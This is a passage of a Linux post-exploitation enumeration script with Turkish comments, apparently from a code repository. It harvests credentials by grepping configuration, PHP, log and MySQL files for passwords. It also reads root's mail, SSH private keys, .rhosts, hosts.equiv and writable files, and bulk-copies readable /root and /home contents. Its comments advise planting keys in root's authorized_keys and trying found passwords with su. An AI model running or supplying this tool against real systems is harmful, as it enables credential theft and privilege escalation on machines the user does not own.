DOSYALARI ICINDE GECEN PASSWORD VE USERNAME SATIRLARI' 431 | printf '\n*******************************************************\n' 432 | cat inc-files-enum.txt | xargs grep -i -E 'pass =|passwd =|pwd =| password =|user =|username =|pass=|passwd=|pwd=|password=|user=|username=|mysql_connect|mysql_select_db' 2>/dev/null 433 | printf '\n*******************************************************\n' 434 | printf 'MYD DOSYALARI ICINDE GECEN PASSWORD VE USERNAME SATIRLARI' 435 | printf '\n*******************************************************\n' 436 | cat myd-files-enum.txt | xargs grep -i -E 'pass =|passwd =|pwd =| password =|user =|username =|pass=|passwd=|pwd=|password=|user=|username=|mysql_connect|mysql_select_db' 2>/dev/null 437 | printf '\n*******************************************************\n' 438 | printf '/ETC DIZINI ALTINDA SONU .CONF* ILE BITEN DOSYALARIN LISTESI VE 439 | ERISIM HAKLARI - find /etc/ -maxdepth 4 -name *.conf* -type f -exec ls -la {} 440 | \;' 441 | printf '\nNOT: Belli bir isim yapisindaki dosyalarin erisim haklarini 442 | listelemek icin dirlist-enum.txt dosyasinden filtrelenmis dosya adlarini 443 | kullanabiliriz.' 444 | printf '\nOrnegin: cat ini-files-enum.txt | xargs ls -al komutuyla sonu ini 445 | ile biten dosyalarin erisim haklarinin listelenmesi gibi' 446 | printf '\n*******************************************************\n' 447 | find /etc/ -maxdepth 4 -name *.conf* -type f -exec ls -la {} \; 2>/dev/null 448 | printf '\n*******************************************************\n' 449 | printf 'ICERIK - /var/mail/root' 450 | printf '\n*******************************************************\n' 451 | cat /var/mail/root 2>/dev/null 452 | printf '\n*******************************************************\n' 453 | printf 'ICERIK - /var/spool/mail/root' 454 | printf '\n*******************************************************\n' 455 | cat /var/spool/mail/root 2>/dev/null 456 | printf '\n*******************************************************\n' 457 | printf 'ICERIK - /etc/syslog.conf' 458 | printf '\n*******************************************************\n' 459 | cat /etc/syslog.conf 2>/dev/null 460 | printf '\n*******************************************************\n' 461 | printf 'ICERIK - /etc/chttp.conf' 462 | printf '\n*******************************************************\n' 463 | cat /etc/chttp.conf 2>/dev/null 464 | printf '\n*******************************************************\n' 465 | printf 'ICERIK - /etc/lighttpd.conf' 466 | printf '\n*******************************************************\n' 467 | cat /etc/lighttpd.conf 2>/dev/null 468 | printf '\n*******************************************************\n' 469 | printf 'ICERIK - /etc/cups/cupsd.conf' 470 | printf '\n*******************************************************\n' 471 | cat /etc/cups/cupsd.conf 2>/dev/null 472 | printf '\n*******************************************************\n' 473 | printf 'ICERIK - /etc/inetd.conf' 474 | printf '\n*******************************************************\n' 475 | cat /etc/inetd.conf 2>/dev/null 476 | printf '\n*******************************************************\n' 477 | printf 'ICERIK - /etc/apache2/apache2.conf' 478 | printf '\n*******************************************************\n' 479 | cat /etc/apache2/apache2.conf 2>/dev/null 480 | printf '\n*******************************************************\n' 481 | printf 'ICERIK - /etc/mysql/my.cnf ve /etc/my.cnf' 482 | printf '\n*******************************************************\n' 483 | cat /etc/mysql/my.cnf 2>/dev/null 484 | cat /etc/my.cnf 2>/dev/null 485 | printf '\n*******************************************************\n' 486 | printf 'ICERIK - /etc/my.conf' 487 | printf '\n*******************************************************\n' 488 | cat /etc/my.conf 2>/dev/null 489 | printf '\n*******************************************************\n' 490 | printf 'ICERIK - /etc/httpd/conf/httpd.conf' 491 | printf '\n*******************************************************\n' 492 | cat /etc/httpd/conf/httpd.conf 2>/dev/null 493 | printf '\n*******************************************************\n' 494 | printf 'ICERIK - /opt/lampp/etc/httpd.conf' 495 | printf '\n*******************************************************\n' 496 | cat /opt/lampp/etc/httpd.conf 2>/dev/null 497 | printf '\n*******************************************************\n' 498 | printf 'ICERIK - /var/apache2/config.inc' 499 | printf '\n*******************************************************\n' 500 | cat /var/apache2/config.inc 2>/dev/null 501 | printf '\n*******************************************************\n' 502 | printf 'ICERIK - /var/lib/mysql/mysql/user.MYD' 503 | printf '\n*******************************************************\n' 504 | cat /var/lib/mysql/mysql/user.MYD 2>/dev/null 505 | printf '\n*******************************************************\n' 506 | printf 'ICERIK - /root/anaconda-ks.cfg' 507 | printf '\n*******************************************************\n' 508 | cat /root/anaconda-ks.cfg 2>/dev/null 509 | printf '\n*******************************************************\n' 510 | printf 'KULLANICIMIZA AIT OLMAYAN ANCAK YAZMA HAKKIMIZ OLAN TUM DOSYALARIN 511 | LISTESI VE ERISIM HAKLARI - find / -writable -not -user whoami -type f -not - 512 | path /proc/* -exec ls -al {} \;' 513 | printf '\n*******************************************************\n' 514 | find / -writable -not -user `whoami` -type f -not -path "/proc/*" -exec ls -al {} \; 2>/dev/null 515 | printf '\n*******************************************************\n' 516 | printf 'TUM WORLD WRITABLE DOSYALARIN LISTESI VE ERISIM HAKLARI - find / ! - 517 | path */proc/* -perm -2 -type f -exec ls -al {} \;' 518 | printf '\n*******************************************************\n' 519 | find / ! -path "*/proc/*" -perm -2 -type f -exec ls -al {} \; 2>/dev/null 520 | printf '\n*******************************************************\n' 521 | printf 'HERKESIN YAZABILECEGI DIZINLERIN LISTESI' 522 | printf '\n*******************************************************\n' 523 | find / -type d -not -path "/proc/*" $ -perm -o+w $ -exec ls -ald {} \; 2>/dev/null 524 | printf '\n*******************************************************\n' 525 | printf 'BIZIM YAZABILECEGIMIZ DIZINLERIN LISTESI - find / -writable -type d - 526 | not -path /proc/* -exec ls -al {} \;' 527 | printf '\nManuel olarak script lerimizi ve ciktilarini yerlestirebilecegimiz 528 | bir dizin bulmak icin de kullanilabilir' 529 | printf '\n*******************************************************\n' 530 | find / -writable -type d -not -path "/proc/*" -exec ls -ald {} \; 2>/dev/null 531 | printf '\n*******************************************************\n' 532 | printf 'KULLANICIMIZA AIT DIZINLERIN LISTESI - find / -user whoami -type d - not -path /proc/* -exec ls -al {} \;' 533 | printf '\n*******************************************************\n' 534 | find / -user `whoami` -type d -not -path "/proc/*" -exec ls -ald {} \; 2>/dev/null 535 | printf '\n*******************************************************\n' 536 | printf 'SSH ANAHTAR VE ANAHTAR DIZINLERININ LISTESI - find / -name id_dsa* -o 537 | -name id_rsa* -o -name known_hosts -o -name authorized_hosts -o -name 538 | authorized_keys: Ozel ve acik anahtar kavramlari ile bunlarin SSH da nasil 539 | kullanıldigi ile ilgili on bilgi edinmenizde fayda var' 540 | printf '\n*******************************************************\n' 541 | find / -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null 542 | printf '\n*******************************************************\n' 543 | printf 'SSH SERVISINE ROOT KULLANICISI OLARAK BAGLANABILIR MIYIZ - grep 544 | PermitRootLogin /etc/ssh/sshd_config 2>/dev/null | grep -v | awk {print 545 | $2}: Gecerli degerler yes, without-password, forced-commands-only, veya no 546 | dur. without-password private key ile erisilebilir anlamina gelir. forcedcommands-only 547 | yapilabilecek islemleri kisitlar ve private key ile 548 | gelinmelidir.' 549 | printf '\n*******************************************************\n' 550 | grep "PermitRootLogin " /etc/ssh/sshd_config 2>/dev/null | grep -v '\#' | awk '{print $2}' 551 | printf '\n*******************************************************\n' 552 | printf 'SSH KONFIGURASYON DIZINI ERISIM HAKLARIMIZ - ls -la /etc/ssh/' 553 | printf '\nBu baglamda root un home dizinindeki authorized keys dizinine 554 | yazabiliyorsak asagidaki linklerden faydalanarak sirasiyla key uretebilir ve 555 | yerlestirebiliriz' 556 | printf '\nhttp://www.thegeekstuff.com/2008/11/3-steps-to-perform-ssh-loginwithout-password-using-ssh-keygen-ssh-copy-id/' 557 | printf '\nhttp://www.rebol.com/docs/ssh-auto-login.html' 558 | printf '\n*******************************************************\n' 559 | ls -la /etc/ssh/ 2>/dev/null 560 | printf '\n*******************************************************\n' 561 | printf 'SHELL UYGULAMALARININ LISTESI - cat /etc/shells' 562 | printf '\n*******************************************************\n' 563 | cat /etc/shells | xargs ls -al 2>/dev/null 564 | printf '\n*******************************************************\n' 565 | printf 'KULLANICIMIZIN PATH CEVRESEL DEGISKENI - echo $PATH' 566 | printf '\n*******************************************************\n' 567 | echo $PATH 568 | printf '\n*******************************************************\n' 569 | printf 'PAROLA POLITIKASI, PAROLA HASH ALGORITMASI V.D. BILGILER - cat 570 | /etc/login.defs' 571 | printf '\n*******************************************************\n' 572 | cat /etc/login.defs 573 | printf '\n*******************************************************\n' 574 | printf 'APACHE PROCESS ININ HANGI KULLANICI OLARAK KONFIGURE EDILDIGI - cat 575 | /etc/apache2/envvars 2>/dev/null |grep -i user\|group |awk {sub(/.*\export 576 | /,)}1 Gercek kullanici bilgisine ps aux ciktisindan erisebiliriz' 577 | printf '\n*******************************************************\n' 578 | cat /etc/apache2/envvars 2>/dev/null |grep -i 'user\|group' |awk '{sub(/.*\export /,"")}1' 579 | printf '\n*******************************************************\n' 580 | printf 'GOREBILDIGIMIZ TUM HOME DIZINLERI ALTINDA VARSA RHOSTS DOSYALARI - 581 | find /home -iname *.rhosts -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;' 582 | printf '\n*******************************************************\n' 583 | find /home -iname *.rhosts -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \; 584 | printf '\n*******************************************************\n' 585 | printf 'EGER HOME DIZINLERI /USR/ DIZINI ALTINDA ISE GOREBILDIGIMIZ HOME 586 | DIZINLERI ALTINDA VARSA RHOSTS DOSYALARI - find /usr/home -iname *.rhosts - 587 | exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;' 588 | printf '\n*******************************************************\n' 589 | find /usr/home -iname *.rhosts -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \; 590 | printf '\n*******************************************************\n' 591 | printf 'HOSTS.EQUIV DOSYASININ ERISIM HAKKI VE GOREBILIYORSAK ICERIGI - find 592 | /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null \; -exec cat {} 593 | 2>/dev/null \;' 594 | printf '\n*******************************************************\n' 595 | find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \; 596 | printf '\n*******************************************************\n' 597 | printf 'EXPORTS DOSYASININ ERISIM HAKLARI - ls -la /etc/exports' 598 | printf '\n*******************************************************\n' 599 | ls -la /etc/exports 2>/dev/null 600 | printf '\n*******************************************************\n' 601 | printf 'OKUYABILIYORSAK EXPORTS DOSYASININ ICERIGI - cat /etc/exports' 602 | printf '\n*******************************************************\n' 603 | cat /etc/exports 2>/dev/null 604 | printf '\n*******************************************************\n' 605 | printf 'VARSA /VAR/MAIL DIZINI ALTINDAKI DOSYALAR VE ERISIM HAKLARI - ls -la 606 | /var/mail - Bu dosyalara manuel olarak bakmak gerekebilir' 607 | printf '\n*******************************************************\n' 608 | ls -la /var/mail 2>/dev/null 609 | printf '\n*******************************************************\n' 610 | printf 'VARSA /VAR/SPOOL/MAIL DIZINI ALTINDAKI DOSYALAR VE ERISIM HAKLARI - 611 | ls -la /var/spool/mail - Bu dosyalara manuel olarak bakmak gerekebilir' 612 | printf '\n*******************************************************\n' 613 | ls -la /var/spool/mail 2>/dev/null 614 | printf '\n*******************************************************\n' 615 | printf 'VARSA VE OKUYABILIYORSAK ROOT UN MAIL KUTUSUNUN ILK BOLUMU - head 616 | /var/mail/root' 617 | printf '\n*******************************************************\n' 618 | head /var/mail/root 2>/dev/null 619 | printf '\n*******************************************************\n' 620 | printf 'VARSA VE OKUYABILIYORSAK ROOT UN MAIL KUTUSUNUN ILK BOLUMU - head 621 | /var/spool/mail/root' 622 | printf '\n*******************************************************\n' 623 | head /var/spool/mail/root 2>/dev/null 624 | printf '\n*******************************************************\n' 625 | printf 'INETD DOSYASININ ICERIGI - cat /etc/inetd.conf - otomatik baslatilan 626 | ag servisleri icin' 627 | printf '\n*******************************************************\n' 628 | cat /etc/inetd.conf 2>/dev/null 629 | printf '\n*******************************************************\n' 630 | printf 'TCP WRAPPER UYGULAYAN SISTEMLER ICIN XINETD DOSYASININ ICERIGI - cat 631 | /etc/xinetd.conf' 632 | printf '\n*******************************************************\n' 633 | cat /etc/xinetd.conf 2>/dev/null 634 | printf '\n*******************************************************\n' 635 | printf 'INIT.D DIZINI ALTINDAKI SCRIPTLER VE ERISIM IZINLERI - ls -la 636 | /etc/init.d - linux uzerine kurulmus servisler hakkinda fikir verir, buradaki 637 | scriptlerin hepsi calismiyor olabilir. Bu dosyalar icinde grep ile kelime 638 | aranabilir' 639 | printf '\n*******************************************************\n' 640 | ls -la /etc/init.d 2>/dev/null 641 | printf '\n*******************************************************\n' 642 | printf 'DUSUK BIR IHTIMAL AMA INIT SCRIPTLERI ICINDE BIR PAROLA OLABILIR MI' 643 | printf '\n*******************************************************\n' 644 | ls /etc/init.d 2>/dev/null| xargs grep -i -E 'pass =|passwd =|pwd =| password =|pass=|passwd=|pwd=|password=' 2>/dev/null 645 | printf '\n*******************************************************\n' 646 | printf 'ROOT KULLANICISINA AIT OLMAYAN ANCAK INIT.D DIZINI ALTINDA BULUNAN 647 | DOSYALARIN LISTESI - find /etc/init.d/ \! -uid 0 -type f 2>/dev/null |xargs - 648 | r ls -la 2>/dev/null' 649 | printf '\n*******************************************************\n' 650 | find /etc/init.d/ \! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null 651 | printf '\n*******************************************************\n' 652 | printf 'INIT SCRIPTLERI RC.D DIZINLERI ALTINDA BULUNAN SISTEMLER ICIN INIT 653 | SCRIPTLERI LISTESI VE ERISIM HAKLARI - ls -la /etc/rc.d/init.d' 654 | printf '\n*******************************************************\n' 655 | ls -la /etc/rc.d/init.d 2>/dev/null 656 | printf '\n*******************************************************\n' 657 | printf 'ROOT KULLANICISINA AIT OLMAYAN ANCAK RC.D/INIT.D DIZINI ALTINDA 658 | BULUNAN DOSYALARIN LISTESI - find /etc/rc.d/init.d \! -uid 0 -type f 659 | 2>/dev/null |xargs -r ls -la 2>/dev/null' 660 | printf '\n*******************************************************\n' 661 | find /etc/rc.d/init.d \! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null 662 | printf '\n*******************************************************\n' 663 | printf 'MOUNT KONFIGURASYONU - cat /etc/fstab *** ONEMLI - REISERFS GIBI 664 | SIRADISI FILE SYSTEM GORURSENIZ EXPLOIT ETMEYI DENEYIN' 665 | printf '\n*******************************************************\n' 666 | cat /etc/fstab 2>/dev/null 667 | printf '\n=======================================================' 668 | printf '\nEK BILGI' 669 | printf '\n=======================================================' 670 | printf '\n*******************************************************\n' 671 | printf 'TUM AG ARAYUZLERININ LISTESI - /sbin/ifconfig -a' 672 | printf '\n*******************************************************\n' 673 | /sbin/ifconfig -a 674 | printf '\n*******************************************************\n' 675 | printf 'SUNUCUDA TANIMLI ROUTE BILGILERI - route' 676 | printf '\n*******************************************************\n' 677 | /sbin/route 2>/dev/null 678 | printf '\n*******************************************************\n' 679 | printf 'MOUNT EDILMIS PARTITION LAR - mount' 680 | printf '\n*******************************************************\n' 681 | mount 2>/dev/null 682 | printf '\n*******************************************************\n' 683 | printf 'MOUNT EDILMIS PARTITION LAR VE KULLANIM ORANLARI - df -h' 684 | printf '\n*******************************************************\n' 685 | df -h 2>/dev/null 686 | printf '\n*******************************************************\n' 687 | printf 'DOSYA TRANSFER ARACLARIMIZ NELER' 688 | printf '\nNOT: Path cevresel degiskenimiz yeterli degilse which komutlari var 689 | oldugu halde dosya transfer araclarini bulamayabilir, bu bolumdeki ciktilari 690 | bu acidan degerlendirmelisiniz.' 691 | printf '\n*******************************************************\n' 692 | which nc 693 | which netcat 694 | which wget 695 | which tftp 696 | which ftp 697 | printf '\n*******************************************************\n' 698 | printf 'KURULU PAKETLER VE VERSIYONLARI' 699 | printf '\n*******************************************************\n' 700 | if grep -q -E -i 'ubuntu|debian' /proc/version; 701 | then 702 | dpkg -l 2>/dev/null 703 | else 704 | rpm -qa 2>/dev/null 705 | fi 706 | printf '\n*******************************************************\n' 707 | printf 'WEB UYGULAMA DIZINLERI VE DOSYALARIN LISTESI - EKLEME YAPILABILIR' 708 | printf 'NOT: Bu dizinlere manuel olarak goz atilmalidir' 709 | printf '\n*******************************************************\n' 710 | ls -alhR /var/www/ 2>/dev/null 711 | ls -alhR /srv/www/htdocs/ 2>/dev/null 712 | ls -alhR /usr/local/www/apache22/data/ 2>/dev/null 713 | ls -alhR /opt/lampp/htdocs/ 2>/dev/null 714 | printf '\n*******************************************************\n' 715 | printf '==DETAYLI PASSWORD VE ROOT KELIMELERI GECEN SATIRLAR==' 716 | printf '\n*******************************************************\n' 717 | printf '\n*******************************************************\n' 718 | printf 'INI DOSYALARI ICINDE PASS, PWD, ROOT VE ADMIN KELIMELERI GECEN 719 | SATIRLAR - cat ini-files-enum.txt | xargs grep -E pass|pwd|root' 720 | printf '\nNOT: grep ile aranan kelimelerin gectigi satirlar yerine sadece bu 721 | kelimelerin gectigi dosyalari gormek istiyorsaniz grep -l komutunu 722 | kullanabilirsiniz' 723 | printf '\nNOT: Manuel olarak belli kelimeleri belli dosyalar icinde aramak 724 | icin su komut kullanilabilir, arama terimlerini tek tirnak icine almayi 725 | unutmayiniz: find / -name *.conf* -type f -exec grep -Hn password|root {} \; 726 | 2>/dev/null ' 727 | printf '\n*******************************************************\n' 728 | cat ini-files-enum.txt | xargs grep -i -E 'pass|pwd|root|admin' 2>/dev/null | grep '=' 729 | printf '\n*******************************************************\n' 730 | printf 'CONF DOSYALARI ICINDE PASS, PWD, ROOT VE ADMIN KELIMELERI GECEN 731 | SATIRLAR - cat conf-files-enum.txt | xargs grep -E pass|pwd|root' 732 | printf '\n*******************************************************\n' 733 | cat conf-files-enum.txt | xargs grep -i -E 'pass|pwd|root|admin' 2>/dev/null | grep '=' 734 | printf '\n*******************************************************\n' 735 | printf 'PHP DOSYALARI ICINDE PASS, PWD, ROOT VE ADMIN KELIMELERI GECEN 736 | SATIRLAR - cat php-files-enum.txt | xargs grep -E pass|pwd|rootr' 737 | printf '\n*******************************************************\n' 738 | cat php-files-enum.txt | xargs grep -i -E 'pass|pwd|root|admin' 2>/dev/null | grep '=' 739 | printf '\n*******************************************************\n' 740 | printf 'PL DOSYALARI ICINDE PASS, PWD, ROOT VE ADMIN KELIMELERI GECEN 741 | SATIRLAR - cat pl-files-enum.txt | xargs grep -E pass|pwd|root' 742 | printf '\n*******************************************************\n' 743 | cat pl-files-enum.txt | xargs grep -i -E 'pass|pwd|root|admin' 2>/dev/null | grep '=' 744 | printf '\n*******************************************************\n' 745 | printf 'SH DOSYALARI ICINDE PASS, PWD, ROOT VE ADMIN KELIMELERI GECEN 746 | SATIRLAR - cat sh-files-enum.txt | xargs grep -E pass|pwd|root' 747 | printf '\n*******************************************************\n' 748 | cat sh-files-enum.txt | xargs grep -i -E 'pass|pwd|root|admin' 2>/dev/null | grep '=' 749 | printf '\n*******************************************************\n' 750 | printf 'LOG DOSYALARI ICINDE PASS, PWD, ROOT VE ADMIN KELIMELERI GECEN 751 | SATIRLAR - cat log-files-enum.txt | xargs grep -E pass|pwd|root' 752 | printf '\n*******************************************************\n' 753 | cat log-files-enum.txt | xargs grep -i -E 'pass|pwd|root|admin' 2>/dev/null | grep '=' 754 | printf '\n*******************************************************\n' 755 | printf 'INC DOSYALARI ICINDE PASS, PWD, ROOT VE ADMIN KELIMELERI GECEN 756 | SATIRLAR - cat inc-files-enum.txt | xargs grep -E pass|pwd|root' 757 | printf '\n*******************************************************\n' 758 | cat inc-files-enum.txt | xargs grep -i -E 'pass|pwd|root|admin' 2>/dev/null | grep '=' 759 | printf '\n*******************************************************\n' 760 | printf 'MYD DOSYALARI ICINDE PASS, PWD, ROOT VE ADMIN KELIMELERI GECEN 761 | SATIRLAR - cat myd-files-enum.txt | xargs grep -E pass|pwd|root' 762 | printf '\n*******************************************************\n' 763 | cat myd-files-enum.txt | xargs grep -i -E 'pass|pwd|root|admin' 2>/dev/null | grep '=' 764 | printf '\n*******************************************************\n' 765 | printf '/root/ DIZINI ALTINDA OKUYABILDIGIMIZ DOSYALARIN ICERIKLERI' 766 | printf '\n*******************************************************\n' 767 | find /root/ -type f -exec tail -n +1 {} + > rootfiles-enum.txt 2>/dev/null 768 | printf '\n*******************************************************\n' 769 | printf '/home/ DIZINI ALTINDA OKUYABILDIGIMIZ DOSYALARIN ICERIKLERI - 770 | ***ONEMLI*** EGER SCRIPTI HOME DIZINI ALTINDA CALISTIRIRSANIZ KENDINIZE DOS 771 | YAPMIS OLURSUNUZ CUNKU SCRIPT KENDI YAZDIKLARINI TEKRAR OKUYUP TEKRAR YAZAR 772 | VE DISKI DOLDURURSUNUZ' 773 | printf '\n*******************************************************\n' 774 | find /home/ -type f -exec tail -n +1 {} + > homefiles-enum.txt 2>/dev/null 775 | printf '\n*******************************************************\n' 776 | printf '/etc/cron* DIZINLERI ALTINDA OKUYABILDIGIMIZ DOSYALARIN ICERIKLERI' 777 | printf '\n*******************************************************\n' 778 | find /etc/cron* -type f -exec tail -n +1 {} + > etccronfiles-enum.txt 2>/dev/null 779 | printf '\n=======================================================' 780 | printf '\nSCRIPT TAMAMLANDI' 781 | printf '\n=======================================================' 782 | printf '\nBULDUGUNUZ PAROLALARI ROOT KULLANICISINA VE SISTEM UZERINDE TANIMLI 783 | DIGER KULLANICILARA SU YAPARAK DENEMEYI UNUTMAYIN\n' 784 | 785 | -------------------------------------------------------------------------------- /nops.xsl: -------------------------------------------------------------------------------- 1 | 2 | 6 | 7 | 8 | 617 | 618 | --------------------------------------------------------------------------------